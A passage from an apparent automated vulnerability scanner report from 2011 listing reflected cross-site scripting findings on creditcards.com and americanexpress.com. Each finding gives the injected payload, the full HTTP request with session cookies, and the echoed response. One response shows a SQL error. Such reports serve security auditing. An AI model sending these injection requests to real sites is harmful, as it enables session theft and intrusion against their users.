Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 43469

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<title>Low Interest Credit Cards - CreditCards.com</title>
<meta name="keywo
...[SNIP]...
<IMG SRC='http://www.creditcards.com/xtrack.php?86305'><script>alert(1)</script>bb92682d3cf=1' border=0 width=1 height=1>
...[SNIP]...

3.13. http://www.creditcards.com/oc/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/oc/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8f62c'><script>alert(1)</script>f62cca6f582 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /oc/?pid=22105561&pg=17&pgpos=1&8f62c'><script>alert(1)</script>f62cca6f582=1 HTTP/1.1
Host: www.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/business.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; Apache=66.219.46.81.1308311437978272; PHPSESSID=eaa1e85235ccec63f45bfe7e1b69c40f; ACTREF=eaa1e85235ccec63f45bfe7e1b69c40f_999__201106170650; CURRREF=999; PREVREF=999; SSBAL=node.web1; s_cc=true; CCsCookieimp=1308311932; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308311937698%27%5D%5D; s_sq=ccardsccdc-us%3D%2526pid%253DTYPE%25253Abusiness%2526pidt%253D1%2526oid%253Dhttp%25253A//www.creditcards.com/oc/%25253Fpid%25253D22105561%252526pg%25253D17%252526pgpos%25253D1%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:59:59 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
refresh: 2; url=http://oc.creditcards.com/trans_node.php?aid=999&tid=&cid=9999&did=9999&fid=17&pos=1&evid=1011106170650383a0cd48cdfdd3a86c&ref=&oid=1012011061706595961146364&data3=0&sid=1889&c=22105561
Vary: Accept-Encoding
Content-Length: 3147
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 11:59:59 GMT; path=/

<html>
<head>
<title>Just a Moment While We Direct You to Your Offer</title>
<meta name="robots" content="NOFOLLOW,NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<
...[SNIP]...
<IMG SRC='http://www.creditcards.com/xtrack.php?pid=22105561&pg=17&pgpos=1&8f62c'><script>alert(1)</script>f62cca6f582=1' border=0 width=1 height=1>
...[SNIP]...

3.14. http://www.creditcards.com/oc/ [pg parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/oc/

Issue detail

The value of the pg request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload abbd6'><script>alert(1)</script>6edbc9715c7 was submitted in the pg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /oc/?pid=22105561&pg=17abbd6'><script>alert(1)</script>6edbc9715c7&pgpos=1 HTTP/1.1
Host: www.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/business.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; Apache=66.219.46.81.1308311437978272; PHPSESSID=eaa1e85235ccec63f45bfe7e1b69c40f; ACTREF=eaa1e85235ccec63f45bfe7e1b69c40f_999__201106170650; CURRREF=999; PREVREF=999; SSBAL=node.web1; s_cc=true; CCsCookieimp=1308311932; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308311937698%27%5D%5D; s_sq=ccardsccdc-us%3D%2526pid%253DTYPE%25253Abusiness%2526pidt%253D1%2526oid%253Dhttp%25253A//www.creditcards.com/oc/%25253Fpid%25253D22105561%252526pg%25253D17%252526pgpos%25253D1%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:59:14 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
refresh: 2; url=http://oc.creditcards.com/trans_node.php?aid=999&tid=&cid=9999&did=9999&fid=17abbd6%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E6edbc9715c7&pos=1&evid=1011106170650383a0cd48cdfdd3a86c&ref=&oid=1012011061706591481395395&data3=0&sid=1889&c=22105561
Vary: Accept-Encoding
Content-Length: 3230
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 11:59:14 GMT; path=/

<html>
<head>
<title>Just a Moment While We Direct You to Your Offer</title>
<meta name="robots" content="NOFOLLOW,NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<
...[SNIP]...
<IMG SRC='http://www.creditcards.com/xtrack.php?pid=22105561&pg=17abbd6'><script>alert(1)</script>6edbc9715c7&pgpos=1' border=0 width=1 height=1>
...[SNIP]...

3.15. http://www.creditcards.com/oc/ [pg parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/oc/

Issue detail

The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7722d"%3balert(1)//57eec6dc958 was submitted in the pg parameter. This input was echoed as 7722d";alert(1)//57eec6dc958 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /oc/?pid=22105561&pg=177722d"%3balert(1)//57eec6dc958&pgpos=1 HTTP/1.1
Host: www.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/business.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; Apache=66.219.46.81.1308311437978272; PHPSESSID=eaa1e85235ccec63f45bfe7e1b69c40f; ACTREF=eaa1e85235ccec63f45bfe7e1b69c40f_999__201106170650; CURRREF=999; PREVREF=999; SSBAL=node.web1; s_cc=true; CCsCookieimp=1308311932; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308311937698%27%5D%5D; s_sq=ccardsccdc-us%3D%2526pid%253DTYPE%25253Abusiness%2526pidt%253D1%2526oid%253Dhttp%25253A//www.creditcards.com/oc/%25253Fpid%25253D22105561%252526pg%25253D17%252526pgpos%25253D1%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:59:14 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
refresh: 2; url=http://oc.creditcards.com/trans_node.php?aid=999&tid=&cid=9999&did=9999&fid=177722d%22%3Balert%281%29%2F%2F57eec6dc958&pos=1&evid=1011106170650383a0cd48cdfdd3a86c&ref=&oid=1012011061706591495452399&data3=0&sid=1889&c=22105561
Vary: Accept-Encoding
Content-Length: 3187
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 11:59:14 GMT; path=/

<html>
<head>
<title>Just a Moment While We Direct You to Your Offer</title>
<meta name="robots" content="NOFOLLOW,NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<
...[SNIP]...
op3=""
s.prop4=""
s.prop5=""
s.prop6=""
s.prop7=""
s.prop8=""
s.prop12=s.c_r('s_vi');
s.prop16="1"
/* Conversion Variables */
s.campaign=""
s.state=""
s.zip=""
s.events="purchase,event2"
s.products="177722d";alert(1)//57eec6dc958;22105561;1;0"
s.purchaseID="1012011061706591495452399"
s.eVar1=""
s.eVar2=""
s.eVar3=""
s.eVar4=""
s.eVar5=""
s.eVar6=""
s.eVar7=""
s.eVar8=""
s.eVar25="177722d";alert(1)//57eec6dc958"
s.eVar26="1"
s.
...[SNIP]...

3.16. http://www.creditcards.com/oc/ [pgpos parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/oc/

Issue detail

The value of the pgpos request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34c7b"%3balert(1)//6aca4030e70 was submitted in the pgpos parameter. This input was echoed as 34c7b";alert(1)//6aca4030e70 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /oc/?pid=22105561&pg=17&pgpos=134c7b"%3balert(1)//6aca4030e70 HTTP/1.1
Host: www.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/business.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; Apache=66.219.46.81.1308311437978272; PHPSESSID=eaa1e85235ccec63f45bfe7e1b69c40f; ACTREF=eaa1e85235ccec63f45bfe7e1b69c40f_999__201106170650; CURRREF=999; PREVREF=999; SSBAL=node.web1; s_cc=true; CCsCookieimp=1308311932; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308311937698%27%5D%5D; s_sq=ccardsccdc-us%3D%2526pid%253DTYPE%25253Abusiness%2526pidt%253D1%2526oid%253Dhttp%25253A//www.creditcards.com/oc/%25253Fpid%25253D22105561%252526pg%25253D17%252526pgpos%25253D1%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:59:19 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
refresh: 2; url=http://oc.creditcards.com/trans_node.php?aid=999&tid=&cid=9999&did=9999&fid=17&pos=134c7b%22%3Balert%281%29%2F%2F6aca4030e70&evid=1011106170650383a0cd48cdfdd3a86c&ref=&oid=1012011061706591965932292&data3=0&sid=1889&c=22105561
Vary: Accept-Encoding
Content-Length: 3187
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 11:59:19 GMT; path=/

<html>
<head>
<title>Just a Moment While We Direct You to Your Offer</title>
<meta name="robots" content="NOFOLLOW,NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<
...[SNIP]...
nes. */
s.pageName="lead confirmation"
s.server=""
s.channel=""
s.pageType=""
s.prop1=""
s.prop2=""
s.prop3=""
s.prop4=""
s.prop5=""
s.prop6=""
s.prop7=""
s.prop8=""
s.prop12=s.c_r('s_vi');
s.prop16="134c7b";alert(1)//6aca4030e70"
/* Conversion Variables */
s.campaign=""
s.state=""
s.zip=""
s.events="purchase,event2"
s.products="17;22105561;1;0"
s.purchaseID="1012011061706591965932292"
s.eVar1=""
s.eVar2=""
s.eVar3=""
s.eVar4=
...[SNIP]...

3.17. http://www.creditcards.com/oc/ [pgpos parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/oc/

Issue detail

The value of the pgpos request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 62eb3'><script>alert(1)</script>a51d3ec71e4 was submitted in the pgpos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /oc/?pid=22105561&pg=17&pgpos=162eb3'><script>alert(1)</script>a51d3ec71e4 HTTP/1.1
Host: www.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/business.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; Apache=66.219.46.81.1308311437978272; PHPSESSID=eaa1e85235ccec63f45bfe7e1b69c40f; ACTREF=eaa1e85235ccec63f45bfe7e1b69c40f_999__201106170650; CURRREF=999; PREVREF=999; SSBAL=node.web1; s_cc=true; CCsCookieimp=1308311932; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308311937698%27%5D%5D; s_sq=ccardsccdc-us%3D%2526pid%253DTYPE%25253Abusiness%2526pidt%253D1%2526oid%253Dhttp%25253A//www.creditcards.com/oc/%25253Fpid%25253D22105561%252526pg%25253D17%252526pgpos%25253D1%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:59:18 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
refresh: 2; url=http://oc.creditcards.com/trans_node.php?aid=999&tid=&cid=9999&did=9999&fid=17&pos=162eb3%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ea51d3ec71e4&evid=1011106170650383a0cd48cdfdd3a86c&ref=&oid=1012011061706591825302258&data3=0&sid=1889&c=22105561
Vary: Accept-Encoding
Content-Length: 3230
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 11:59:18 GMT; path=/

<html>
<head>
<title>Just a Moment While We Direct You to Your Offer</title>
<meta name="robots" content="NOFOLLOW,NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<
...[SNIP]...
<IMG SRC='http://www.creditcards.com/xtrack.php?pid=22105561&pg=17&pgpos=162eb3'><script>alert(1)</script>a51d3ec71e4' border=0 width=1 height=1>
...[SNIP]...

3.18. http://www.creditcards.com/oc/ [pid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/oc/

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a930"%3balert(1)//b128c8fd28 was submitted in the pid parameter. This input was echoed as 1a930";alert(1)//b128c8fd28 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /oc/?pid=221055611a930"%3balert(1)//b128c8fd28&pg=17&pgpos=1 HTTP/1.1
Host: www.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/business.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; Apache=66.219.46.81.1308311437978272; PHPSESSID=eaa1e85235ccec63f45bfe7e1b69c40f; ACTREF=eaa1e85235ccec63f45bfe7e1b69c40f_999__201106170650; CURRREF=999; PREVREF=999; SSBAL=node.web1; s_cc=true; CCsCookieimp=1308311932; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308311937698%27%5D%5D; s_sq=ccardsccdc-us%3D%2526pid%253DTYPE%25253Abusiness%2526pidt%253D1%2526oid%253Dhttp%25253A//www.creditcards.com/oc/%25253Fpid%25253D22105561%252526pg%25253D17%252526pgpos%25253D1%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:59:11 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
refresh: 2; url=http://oc.creditcards.com/trans_node.php?aid=999&tid=&cid=9999&did=9999&fid=17&pos=1&evid=1011106170650383a0cd48cdfdd3a86c&ref=&oid=1012011061706591170368870&data3=0&sid=1889&c=221055611a930%22%3Balert%281%29%2F%2Fb128c8fd28
Vary: Accept-Encoding
Content-Length: 2811
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 11:59:11 GMT; path=/

<html>
<head>
<title>Just a Moment While We Direct You to Your Offer</title>
<meta name="robots" content="NOFOLLOW,NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"
...[SNIP]...
prop5=""
s.prop6=""
s.prop7=""
s.prop8=""
s.prop12=s.c_r('s_vi');
s.prop16="1"
/* Conversion Variables */
s.campaign=""
s.state=""
s.zip=""
s.events="purchase,event2"
s.products="17;221055611a930";alert(1)//b128c8fd28;1;0"
s.purchaseID="1012011061706591170368870"
s.eVar1=""
s.eVar2=""
s.eVar3=""
s.eVar4=""
s.eVar5=""
s.eVar6=""
s.eVar7=""
s.eVar8=""
s.eVar25="17"
s.eVar26="1"
s.eVar18=s.c_r('s_vi');

...[SNIP]...

3.19. http://www.creditcards.com/oc/ [pid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/oc/

Issue detail

The value of the pid request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a7662'><script>alert(1)</script>5947a69cf4f was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /oc/?pid=22105561a7662'><script>alert(1)</script>5947a69cf4f&pg=17&pgpos=1 HTTP/1.1
Host: www.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/business.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; Apache=66.219.46.81.1308311437978272; PHPSESSID=eaa1e85235ccec63f45bfe7e1b69c40f; ACTREF=eaa1e85235ccec63f45bfe7e1b69c40f_999__201106170650; CURRREF=999; PREVREF=999; SSBAL=node.web1; s_cc=true; CCsCookieimp=1308311932; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308311937698%27%5D%5D; s_sq=ccardsccdc-us%3D%2526pid%253DTYPE%25253Abusiness%2526pidt%253D1%2526oid%253Dhttp%25253A//www.creditcards.com/oc/%25253Fpid%25253D22105561%252526pg%25253D17%252526pgpos%25253D1%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:59:10 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 3829
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 11:59:10 GMT; path=/

<center><span class='error'>SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '><script>alert(1)</script>
...[SNIP]...
<IMG SRC='http://www.creditcards.com/xtrack.php?pid=22105561a7662'><script>alert(1)</script>5947a69cf4f&pg=17&pgpos=1' border=0 width=1 height=1>
...[SNIP]...

3.20. http://www.creditcards.com/points-rewards.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/points-rewards.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 72445'><script>alert(1)</script>5f52304f04f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /points-rewards.php?72445'><script>alert(1)</script>5f52304f04f=1 HTTP/1.1
Host: www.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; Apache=66.219.46.81.1308311437978272; PHPSESSID=eaa1e85235ccec63f45bfe7e1b69c40f; ACTREF=eaa1e85235ccec63f45bfe7e1b69c40f_999__201106170650; CURRREF=999; PREVREF=999; SSBAL=node.web1; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%5D; s_cc=true; s_sq=%5B%5BB%5D%5D; CCsCookieimp=1308311486

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:59:51 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 44230

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<title>Points Rewards Credit Cards - CreditCards.com</title>
<meta name="key
...[SNIP]...
<IMG SRC='http://www.creditcards.com/xtrack.php?72445'><script>alert(1)</script>5f52304f04f=1' border=0 width=1 height=1>
...[SNIP]...

3.21. http://www262.americanexpress.com/landing-page/business-cards/mclp/scashplum/pm0002/42732 [BUID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www262.americanexpress.com
Path:	/landing-page/business-cards/mclp/scashplum/pm0002/42732

Issue detail

The value of the BUID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7ca2"-alert(1)-"ab9427c0d98 was submitted in the BUID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /landing-page/business-cards/mclp/scashplum/pm0002/42732?PID=1&BUID=SBSf7ca2"-alert(1)-"ab9427c0d98&PSKU=SCB&CRTV=SCBPML&EAID=EhraRx8K%2FBE-figIFch8YIne3Ub0J2Tk5g HTTP/1.1
Host: www262.americanexpress.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22035646&pg=17&pgpos=6
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SaneID=173.193.214.243-1308311996862975

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:00:29 GMT
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 22161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<he
...[SNIP]...
aet) var aet = {}; aet.data = {"page" : {"type" : "DLP", "name" : "pm0002", "cheetahmail" : {"aid" : "", "n" : "", "fsub" : "", "OA_RECENT_SRC" : "", "OA_PRODID" : "" },"querystring" : "PID=1&BUID=SBSf7ca2"-alert(1)-"ab9427c0d98&PSKU=SCB&CRTV=SCBPML&EAID=EhraRx8K%2FBE-figIFch8YIne3Ub0J2Tk5g", "estara" : "as00.estara.com/fs/lr.php?onload=1&accountid=200106285055", "doubleclick" : "https://fls.doubleclick.net/activityi;src=1297
...[SNIP]...

3.22. http://www262.americanexpress.com/landing-page/business-cards/mclp/scashplum/pm0002/42732 [CRTV parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www262.americanexpress.com
Path:	/landing-page/business-cards/mclp/scashplum/pm0002/42732

Issue detail

The value of the CRTV request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a94eb"-alert(1)-"313a6721a4e was submitted in the CRTV parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /landing-page/business-cards/mclp/scashplum/pm0002/42732?PID=1&BUID=SBS&PSKU=SCB&CRTV=SCBPMLa94eb"-alert(1)-"313a6721a4e&EAID=EhraRx8K%2FBE-figIFch8YIne3Ub0J2Tk5g HTTP/1.1
Host: www262.americanexpress.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22035646&pg=17&pgpos=6
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SaneID=173.193.214.243-1308311996862975

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:01:01 GMT
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
